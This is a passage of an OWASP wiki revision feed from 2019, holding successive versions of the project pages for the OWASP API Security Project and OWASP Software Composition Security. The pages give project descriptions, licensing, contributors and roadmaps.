   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Software_Composition_Security&amp;diff=252556</id>
		<title>OWASP Software Composition Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Software_Composition_Security&amp;diff=252556"/>
				<updated>2019-06-23T08:32:04Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Changed reference in the About section&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
Instructions are in RED text and should be removed from your document by deleting the text with the span tags. This document is intended to serve as an example of what is required of an OWASP project wiki page. The text in red serves as instructions, while the text in black serves as an example. Text in black is expected to be replaced entirely with information specific to your OWASP project.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
==Project About==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
{{:Template:Project About&lt;br /&gt;
   |project_name=Software Composition Security&lt;br /&gt;
   |leader_name1=Erez Yalon&lt;br /&gt;
   |leader_email1=erez.yalon@owasp.org&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==OWASP Documentation Project Template==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	This section should include an overview of what the project is, why the project was started, and what security issue is being addressed by the project deliverable. Some readers may be discouraged from looking further at the project if they do not understand the significance of the security concern that is being addressed, so provide enough context so the average reader will continue on with reading the description. You shouldn't assume the reader will understand the objective by providing security terminology, e.g. this project builds cryptographic algorithms, but should also endeavor to explain what they are used for.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The OWASP Documentation Template Project is a template designed to help Project Leaders create suitable project pages for OWASP Projects.  By following the instructional text in red (and then deleting it) it should be easier to understand what information OWASP and the project users are looking for.  And it's easy to get started by simply creating a new project from the appropriate project template.&lt;br /&gt;
&lt;br /&gt;
==About Software Composition Security==&lt;br /&gt;
Open source software (OSS) comprises a significant portion of a modern software ecosystem; Gartner reports that 95% of IT organizations consume open source within their mission-critical IT portfolios ([https://www.gartner.com/en/documents/3891628 Gartner Hype Cycle for Open Source Software 2018]). The rapid adoption of open source in software development stems from the ability to leverage the collaborative efforts of a global open source community without having to invest the time and resources into developing a similar piece of software in-house. &lt;br /&gt;
Yet there are potential risks: the transparent nature of open source can be a clear roadmap for malicious hackers to find vulnerabilities and to craft exploits for popular OSS components; complex open source licenses can put intellectual property at risk; and relying on the open source community to adequately maintain specific component versions can leave development teams exposed to unpatched vulnerabilities across project branches.&lt;br /&gt;
&lt;br /&gt;
Software composition analysis (SCA) is the industry term for the process of detecting open source components within an application, identifying the security vulnerabilities associated with specific component versions, tracking the software licenses associated with them, and evaluating operational risks of a waning open source community. Proper implementation of an SCA solution empowers organizations with greater insight into, and control over, their open source risk exposure. The result: teams involved with application development, security, and deployment can easily identify and remediate OSS vulnerabilities, establish policies for OSS consumption, and monitor for newly discovered vulnerabilities even after existing ones have been addressed. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
A project must be licensed under a community friendly or open source license.  For more information on OWASP recommended licenses, please see [https://www.owasp.org/index.php/OWASP_Licenses OWASP Licenses]. While OWASP does not promote any particular license over another, the vast majority of projects have chosen a Creative Commons license variant for documentation projects, or a GNU General Public License variant for tools and code projects.  This example assumes that you want to use the AGPL 3.0 license.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This program is free software: you can redistribute it and/or modify it under the terms of the [http://www.gnu.org/licenses/agpl-3.0.html link GNU Affero General Public License 3.0] as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.  OWASP XXX and any contributions are Copyright &amp;amp;copy; by {the Project Leader(s) or OWASP} {Year(s)}.  &lt;br /&gt;
&lt;br /&gt;
==Roadmap==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
As of &amp;lt;strong&amp;gt;November, 2013, the highest priorities for the next 6 months&amp;lt;/strong&amp;gt; are:&lt;br /&gt;
&amp;lt;strong&amp;gt;&lt;br /&gt;
* Complete the first draft of the Documentation Project Template&lt;br /&gt;
* Get other people to review the Documentation Project Template and provide feedback&lt;br /&gt;
* Incorporate feedback into changes in the Documentation Project Template&lt;br /&gt;
* Finalize the Documentation Project template and have it reviewed to be promoted from an Incubator Project to a Lab Project&lt;br /&gt;
&amp;lt;/strong&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Subsequent Releases will add&lt;br /&gt;
&amp;lt;strong&amp;gt;&lt;br /&gt;
* Internationalization Support&lt;br /&gt;
* Additional Unit Tests&lt;br /&gt;
* Automated Regression tests&lt;br /&gt;
&amp;lt;/strong&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Getting Involved==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
Involvement in the development and promotion of &amp;lt;strong&amp;gt;Documentation Project Template&amp;lt;/strong&amp;gt; is actively encouraged!&lt;br /&gt;
You do not have to be a security expert or a programmer to contribute.&lt;br /&gt;
Some of the ways you can help are as follows:&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Resources ==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	This is where you can link to the key locations for project files, including setup programs, the source code repository, online documentation, a Wiki Home Page, threaded discussions about the project, and Issue Tracking system, etc. &lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Installation Package]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Source Code]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves What's New (Revision History)]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Documentation]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Wiki Home Page]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Issue Tracker]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Slide Presentation]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Video]&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	A project leader is the individual who decides to lead the project throughout its lifecycle. The project leader is responsible for communicating the project’s progress to the OWASP Foundation, and he/she is ultimately responsible for the project’s deliverables. The project leader must provide OWASP with his/her real name and contact e-mail address for his/her project application to be accepted, as OWASP prides itself on the openness of its products, operations, and members.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[mailto://erez.yalon@owasp.org Erez Yalon]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	This is where you can link to other OWASP Projects that are similar to yours. &lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
* [[OWASP_Code_Project_Template]]&lt;br /&gt;
* [[OWASP_Tool_Project_Template]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=https://www.owasp.org/index.php/Category:OWASP_Document]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects|Incubator Project]] &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=Defenders]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[Image:Creative%20Commons.png| 90px | link=https://creativecommons.org/licenses/by-sa/3.0/| Creative Commons Attribution ShareAlike 3.0 License]]&lt;br /&gt;
   |}&lt;br /&gt;
|}&lt;br /&gt;
 &lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]] [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252425</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252425"/>
				<updated>2019-06-17T12:20:33Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added a &amp;quot;What is API Security?&amp;quot; section&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer facing, partner facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/tree/develop GitHub]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Software_Composition_Security&amp;diff=252032</id>
		<title>OWASP Software Composition Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Software_Composition_Security&amp;diff=252032"/>
				<updated>2019-06-01T11:58:04Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added a description of Software Composition Security&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
Instructions are in RED text and should be removed from your document by deleting the text with the span tags. This document is intended to serve as an example of what is required of an OWASP project wiki page. The text in red serves as instructions, while the text in black serves as an example. Text in black is expected to be replaced entirely with information specific to your OWASP project.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
==Project About==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
{{:Template:Project About&lt;br /&gt;
   |project_name=Software Composition Security&lt;br /&gt;
   |leader_name1=Erez Yalon&lt;br /&gt;
   |leader_email1=erez.yalon@owasp.org&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==OWASP Documentation Project Template==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	This section should include an overview of what the project is, why the project was started, and what security issue is being addressed by the project deliverable. Some readers may be discouraged from looking further at the project if they do not understand the significance of the security concern that is being addressed, so provide enough context so the average reader will continue on with reading the description. You shouldn't assume the reader will understand the objective by providing security terminology, e.g. this project builds cryptographic algorithms, but should also endeavor to explain what they are used for.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The OWASP Documentation Template Project is a template designed to help Project Leaders create suitable project pages for OWASP Projects.  By following the instructional text in red (and then deleting it) it should be easier to understand what information OWASP and the project users are looking for.  And it's easy to get started by simply creating a new project from the appropriate project template.&lt;br /&gt;
&lt;br /&gt;
==About Software Composition Security==&lt;br /&gt;
Open source software (OSS) comprises a significant portion of a modern software ecosystem; recent Forrester data indicates that open source components make up 80%-90% of the average application. The rapid adoption of open source in software development stems from the ability to leverage the collaborative efforts of a global open source community without having to invest the time and resources into developing a similar piece of software in-house. &lt;br /&gt;
Yet there are potential risks: the transparent nature of open source can be a clear roadmap for malicious hackers to find vulnerabilities and to craft exploits for popular OSS components; complex open source licenses can put intellectual property at risk; and relying on the open source community to adequately maintain specific component versions can leave development teams exposed to unpatched vulnerabilities across project branches.&lt;br /&gt;
Software composition analysis (SCA) is the industry term for the process of detecting open source components within an application, identifying the security vulnerabilities associated with specific component versions, tracking the software licenses associated with them, and evaluating operational risks of a waning open source community. Proper implementation of an SCA solution empowers organizations with greater insight into, and control over, their open source risk exposure. The result: teams involved with application development, security, and deployment can easily identify and remediate OSS vulnerabilities, establish policies for OSS consumption, and monitor for newly discovered vulnerabilities even after existing ones have been addressed. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
A project must be licensed under a community friendly or open source license.  For more information on OWASP recommended licenses, please see [https://www.owasp.org/index.php/OWASP_Licenses OWASP Licenses]. While OWASP does not promote any particular license over another, the vast majority of projects have chosen a Creative Commons license variant for documentation projects, or a GNU General Public License variant for tools and code projects.  This example assumes that you want to use the AGPL 3.0 license.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This program is free software: you can redistribute it and/or modify it under the terms of the [http://www.gnu.org/licenses/agpl-3.0.html link GNU Affero General Public License 3.0] as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.  OWASP XXX and any contributions are Copyright &amp;amp;copy; by {the Project Leader(s) or OWASP} {Year(s)}.  &lt;br /&gt;
&lt;br /&gt;
==Roadmap==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
As of &amp;lt;strong&amp;gt;November, 2013, the highest priorities for the next 6 months&amp;lt;/strong&amp;gt; are:&lt;br /&gt;
&amp;lt;strong&amp;gt;&lt;br /&gt;
* Complete the first draft of the Documentation Project Template&lt;br /&gt;
* Get other people to review the Documentation Project Template and provide feedback&lt;br /&gt;
* Incorporate feedback into changes in the Documentation Project Template&lt;br /&gt;
* Finalize the Documentation Project template and have it reviewed to be promoted from an Incubator Project to a Lab Project&lt;br /&gt;
&amp;lt;/strong&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Subsequent Releases will add&lt;br /&gt;
&amp;lt;strong&amp;gt;&lt;br /&gt;
* Internationalization Support&lt;br /&gt;
* Additional Unit Tests&lt;br /&gt;
* Automated Regression tests&lt;br /&gt;
&amp;lt;/strong&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Getting Involved==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
Involvement in the development and promotion of &amp;lt;strong&amp;gt;Documentation Project Template&amp;lt;/strong&amp;gt; is actively encouraged!&lt;br /&gt;
You do not have to be a security expert or a programmer to contribute.&lt;br /&gt;
Some of the ways you can help are as follows:&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Resources ==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	This is where you can link to the key locations for project files, including setup programs, the source code repository, online documentation, a Wiki Home Page, threaded discussions about the project, and Issue Tracking system, etc. &lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Installation Package]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Source Code]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves What's New (Revision History)]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Documentation]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Wiki Home Page]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Issue Tracker]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Slide Presentation]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/SamanthaGroves Video]&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	A project leader is the individual who decides to lead the project throughout its lifecycle. The project leader is responsible for communicating the project’s progress to the OWASP Foundation, and he/she is ultimately responsible for the project’s deliverables. The project leader must provide OWASP with his/her real name and contact e-mail address for his/her project application to be accepted, as OWASP prides itself on the openness of its products, operations, and members.&lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[mailto://erez.yalon@owasp.org Erez Yalon]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;&lt;br /&gt;
	This is where you can link to other OWASP Projects that are similar to yours. &lt;br /&gt;
&amp;lt;/span&amp;gt;&lt;br /&gt;
* [[OWASP_Code_Project_Template]]&lt;br /&gt;
* [[OWASP_Tool_Project_Template]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=https://www.owasp.org/index.php/Category:OWASP_Document]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects|Incubator Project]] &lt;br /&gt;
   |-&lt;br /&gt;
